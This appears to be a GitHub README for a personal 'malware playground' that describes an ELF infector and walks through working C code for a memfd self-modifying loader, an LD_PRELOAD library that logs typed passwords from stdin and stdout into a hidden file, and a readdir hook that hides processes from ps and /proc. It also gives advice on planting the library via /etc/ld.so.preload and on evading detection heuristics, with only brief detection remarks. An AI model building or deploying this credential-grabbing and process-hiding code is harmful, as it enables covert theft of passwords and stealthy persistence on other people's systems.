
Im-0xea/xea-malware-fun


Stub

For giggles I took the fasm ELF injection stub from kspalaiologos and rewrote it in C, then added a function that (badly) checks whether a binary is already infected, and a propagate function that infects arbitrary binaries when it has permission to do so, as far as the aggressiveness value allows.

Selfmod

Last time I tried making a self-modifying program I got shot down all over the place by security measures and by the overly complex functions needed to make .text writable. This time I made a program that injects a negated payload into a copy of its own ELF, stored in a memfd, and execve()s that copy.

Selfmod-ng

Basically the same concept as Selfmod, but instead of storing the payload in .data, the makefile dd's the negated payload into the payload function, leaving padding for a condition that stops the negated payload from being executed (that wouldn't work anyway). In the copy the condition is removed and the payload is found and negated back.
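The memfd copy-patch-exec trick that both Selfmod and Selfmod-ng rely on, as an added example (my code, not the code in this repo): copy /proc/self/exe into an anonymous memfd, find a marker in the image, un-negate the bytes after it with pwrite(), and fexecve() the patched copy. To keep the demo harmless the negated region is a string rather than a function body, so nothing is executed out of the patched bytes, but the mechanics are the same ones the two programs use. The marker "SELFMOD!", the SELFMOD_CHILD environment variable, the 0x5A marker key and the use of the raw memfd_create syscall are all my choices, not the project's.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef MFD_CLOEXEC
#define MFD_CLOEXEC 1U      /* value from <linux/memfd.h>, for libc headers that hide it */
#endif
extern char **environ;

#define MARK_LEN 8
#define PAYLOAD_LEN 16

/* Marker followed by the payload stored negated (XOR 0xFF). The plaintext
 * "hello from child" never exists in the on-disk binary; only the patched copy
 * in the memfd holds it. Constructed demo payload, a string instead of code. */
static const unsigned char payload[MARK_LEN + PAYLOAD_LEN] = {
    'S', 'E', 'L', 'F', 'M', 'O', 'D', '!',
    'h' ^ 0xFF, 'e' ^ 0xFF, 'l' ^ 0xFF, 'l' ^ 0xFF, 'o' ^ 0xFF, ' ' ^ 0xFF,
    'f' ^ 0xFF, 'r' ^ 0xFF, 'o' ^ 0xFF, 'm' ^ 0xFF, ' ' ^ 0xFF, 'c' ^ 0xFF,
    'h' ^ 0xFF, 'i' ^ 0xFF, 'l' ^ 0xFF, 'd' ^ 0xFF,
};

/* Marker XOR 0x5A, decoded at run time so the plaintext marker occurs in the
 * image exactly once (inside payload[]) and the search cannot hit a decoy. */
static const unsigned char marker_xored[MARK_LEN] = {
    'S' ^ 0x5A, 'E' ^ 0x5A, 'L' ^ 0x5A, 'F' ^ 0x5A,
    'M' ^ 0x5A, 'O' ^ 0x5A, 'D' ^ 0x5A, '!' ^ 0x5A,
};

static void decode_marker(unsigned char out[MARK_LEN]) {
    volatile unsigned char key = 0x5A;  /* volatile: keep the compiler from folding the plaintext */
    for (int i = 0; i < MARK_LEN; i++) out[i] = marker_xored[i] ^ key;
}

/* Offset of needle in hay, or -1. A plain scan is fine for a small ELF image. */
long find_pattern(const unsigned char *hay, size_t n, const unsigned char *needle, size_t m) {
    if (m == 0 || n < m) return -1;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return (long)i;
    return -1;
}

/* Copy everything readable from src into a fresh anonymous memfd; returns the
 * memfd or -1. Raw syscall, so this also builds where libc lacks memfd_create(). */
int memfd_from_fd(int src) {
    int mfd = (int)syscall(SYS_memfd_create, "", MFD_CLOEXEC);
    if (mfd < 0) return -1;
    unsigned char buf[4096];
    ssize_t n;
    while ((n = read(src, buf, sizeof buf)) > 0) {
        for (ssize_t off = 0; off < n;) {
            ssize_t w = write(mfd, buf + off, (size_t)(n - off));
            if (w < 0) { close(mfd); return -1; }
            off += w;
        }
    }
    if (n < 0) { close(mfd); return -1; }
    return mfd;
}

/* Find the marker in the memfd image, un-negate the PAYLOAD_LEN bytes after it
 * in place, and return the file offset of the now-plaintext payload, or -1. */
long patch_copy(int mfd) {
    struct stat st;
    if (fstat(mfd, &st) < 0 || st.st_size <= 0) return -1;
    size_t len = (size_t)st.st_size;
    unsigned char *img = malloc(len);
    if (!img) return -1;
    for (size_t got = 0; got < len;) {
        ssize_t n = pread(mfd, img + got, len - got, (off_t)got);
        if (n <= 0) { free(img); return -1; }
        got += (size_t)n;
    }
    unsigned char marker[MARK_LEN];
    decode_marker(marker);
    long at = find_pattern(img, len, marker, MARK_LEN), result = -1;
    if (at >= 0 && (size_t)at + MARK_LEN + PAYLOAD_LEN <= len) {
        unsigned char *p = img + at + MARK_LEN;
        for (int i = 0; i < PAYLOAD_LEN; i++) p[i] ^= 0xFF;   /* negate back to plaintext */
        if (pwrite(mfd, p, PAYLOAD_LEN, (off_t)(at + MARK_LEN)) == PAYLOAD_LEN)
            result = at + MARK_LEN;
    }
    free(img);
    return result;
}

int main(int argc, char **argv) {
    (void)argc;
    if (getenv("SELFMOD_CHILD")) {   /* we are the patched copy, running out of the memfd */
        printf("child payload: %.*s\n", PAYLOAD_LEN, (const char *)payload + MARK_LEN);
        return 0;
    }
    int src = open("/proc/self/exe", O_RDONLY);
    int mfd = src < 0 ? -1 : memfd_from_fd(src);
    if (mfd < 0 || patch_copy(mfd) < 0) { perror("selfmod"); return 1; }
    setenv("SELFMOD_CHILD", "1", 1);
    fexecve(mfd, argv, environ);     /* replaces this process with the patched in-memory copy */
    perror("fexecve");
    return 1;
}
```

`gcc -O2 -o selfmod selfmod_memfd.c && ./selfmod` prints `child payload: hello from child`, while `strings selfmod` never shows that text, and the child's /proc/PID/exe points at a `/memfd:` path rather than the file on disk. That last point is also the detection handle: a process whose exe link is a memfd, or whose mapped image does not match any file, is exactly what this technique produces.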

Libstdinhook

Inspired by a process hider library that overrides libc's dynamically resolved readdir function, this library hooks the read() function (which 90% of all terminal password prompts end up calling) and dumps every buffer that came from stdin (fd 0) into HOOK_FILE. Prompts that open /dev/tty directly (sudo, ssh, anything built on getpass(3)) read from a different descriptor, so a filter on fd 0 does not see them; interactive shells, REPLs and anything piped on stdin it does.

All you need to do is hide it somewhere and force it in with either the LD_PRELOAD env var, which is practical for targeted login grabbing, or /etc/ld.so.preload for global stdin poisoning (this requires root). The one downside: LD_PRELOAD is ignored by setuid binaries, since the dynamic loader drops it in secure-execution mode.

Libstdouthook

The exact same thing, but for write(), capturing stdout and stderr (fd 1 and fd 2).
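Both hooks in one preload library, as an added example (my code, not the repo's libstdinhook or libstdouthook source): read() mirrors fd 0, write() mirrors fd 1 and 2, both into HOOK_FILE. Two details matter in practice and are easy to get wrong: the log must be written with the raw syscall, otherwise the write() hook calls itself, and errno from the real call must survive the logging or the hooked program sees phantom errors. The path "/tmp/.stdio_hook" and the "[fdN] " tag format are my choices.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef HOOK_FILE
#define HOOK_FILE "/tmp/.stdio_hook"   /* assumed path; pick something less obvious */
#endif

/* Which descriptors to mirror: stdin for read(), stdout and stderr for write(). */
int capture_read_fd(int fd)  { return fd == 0; }
int capture_write_fd(int fd) { return fd == 1 || fd == 2; }

/* Lazily opened log descriptor; -2 means "open failed once, stop retrying". */
static int log_fd = -1;
static int log_open(void) {
    if (log_fd == -1) {
        log_fd = open(HOOK_FILE, O_WRONLY | O_CREAT | O_APPEND | O_CLOEXEC, 0600);
        if (log_fd < 0) log_fd = -2;
    }
    return log_fd;
}

/* Write all of buf with the raw syscall so the interposed write() is never re-entered. */
static ssize_t raw_write_all(int fd, const void *buf, size_t n) {
    size_t off = 0;
    while (off < n) {
        ssize_t w = (ssize_t)syscall(SYS_write, fd, (const char *)buf + off, n - off);
        if (w < 0) { if (errno == EINTR) continue; return -1; }
        off += (size_t)w;
    }
    return (ssize_t)off;
}

/* Append "[fdN] " plus n bytes of buf to out_fd. Returns bytes written, or -1. */
ssize_t log_append(int out_fd, int src_fd, const void *buf, size_t n) {
    if (out_fd < 0) return -1;
    char tag[16];
    int tl = snprintf(tag, sizeof tag, "[fd%d] ", src_fd);
    if (tl < 0 || raw_write_all(out_fd, tag, (size_t)tl) < 0) return -1;
    if (raw_write_all(out_fd, buf, n) < 0) return -1;
    return (ssize_t)(tl + n);
}

/* Interposed read(): go straight to the kernel, then mirror stdin data.
 * errno from the real call is saved across the logging and restored. */
ssize_t read(int fd, void *buf, size_t count) {
    ssize_t n = (ssize_t)syscall(SYS_read, fd, buf, count);
    int saved = errno;
    if (n > 0 && capture_read_fd(fd)) log_append(log_open(), fd, buf, (size_t)n);
    errno = saved;
    return n;
}

/* Interposed write(): same treatment for stdout and stderr. */
ssize_t write(int fd, const void *buf, size_t count) {
    ssize_t n = (ssize_t)syscall(SYS_write, fd, buf, count);
    int saved = errno;
    if (n > 0 && capture_write_fd(fd)) log_append(log_open(), fd, buf, (size_t)n);
    errno = saved;
    return n;
}
```

Build with `gcc -shared -fPIC -o libstdiohook.so libstdiohook.c`, then `LD_PRELOAD=./libstdiohook.so bash -c 'read -s -p "Password: " p; echo'` lands both the prompt (fd 2) and the typed password (fd 0) in HOOK_FILE. Going through the syscall instead of dlsym(RTLD_NEXT, "read") also means the library never touches libdl, which keeps it out of the usual "preload library resolving read/write at load time" heuristics; the flip side is that any defender comparing `ldd`-visible libraries against /etc/ld.so.preload or LD_PRELOAD in /proc/PID/environ still sees it.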

Libprocesshider

A more efficient and minimal implementation of the process hider preload library mentioned above.
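The readdir() interposition such a process hider is built on, as an added example (my code, not the repo's Libprocesshider): resolve the real readdir with dlsym(RTLD_NEXT), and when the directory being listed is /proc itself, skip any PID entry whose /proc/PID/comm matches the hidden name. Checking that the DIR really is /proc (by device and inode) avoids hiding numeric entries in unrelated directories. The hidden name "evilproc" and the set_hidden_comm() setter are my additions for demonstration; 32-bit programs built with large-file support call readdir64 instead and need the same hook under that name.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <ctype.h>
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *)-1l)   /* glibc's value, in case the headers hide it */
#endif

/* Process name, as shown in /proc/<pid>/comm, to hide. Assumed value. */
static const char *hidden_comm = "evilproc";
void set_hidden_comm(const char *name) { hidden_comm = name; }

/* /proc lists processes as all-digit directory names. */
int is_pid_name(const char *name) {
    if (!*name) return 0;
    for (; *name; name++)
        if (!isdigit((unsigned char)*name)) return 0;
    return 1;
}

/* Read /proc/<pid>/comm into out without the trailing newline. 1 on success. */
int read_comm(const char *pid, char *out, size_t outlen) {
    char path[64];
    if (snprintf(path, sizeof path, "/proc/%s/comm", pid) >= (int)sizeof path) return 0;
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0) return 0;
    ssize_t n = read(fd, out, outlen - 1);
    close(fd);
    if (n <= 0) return 0;
    out[n] = '\0';
    if (out[n - 1] == '\n') out[n - 1] = '\0';
    return 1;
}

/* Hide an entry only if it is a PID directory whose comm matches the target. */
int should_hide(const char *name) {
    char comm[64];
    return is_pid_name(name) && read_comm(name, comm, sizeof comm) &&
           strcmp(comm, hidden_comm) == 0;
}

/* Filter only listings of /proc itself: compare device and inode of the handle. */
static int dir_is_proc(DIR *dirp) {
    struct stat a, b;
    return fstat(dirfd(dirp), &a) == 0 && stat("/proc", &b) == 0 &&
           a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

/* Interposed readdir(): resolve the real one once, then skip hidden entries. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *);
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    int filter = dir_is_proc(dirp);
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL && filter && should_hide(e->d_name))
        ;
    return e;
}
```

Build with `gcc -shared -fPIC -o libprocesshider.so libprocesshider.c` and list it in /etc/ld.so.preload; `ps`, `top` and `ls /proc` then stop showing the process, but anything that does not go through libc's readdir (a static binary, a direct getdents64 call, or `cat /proc/PID/status` with a guessed PID) still finds it, which is exactly how this class of hider is caught.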

About

Playground for my malware.
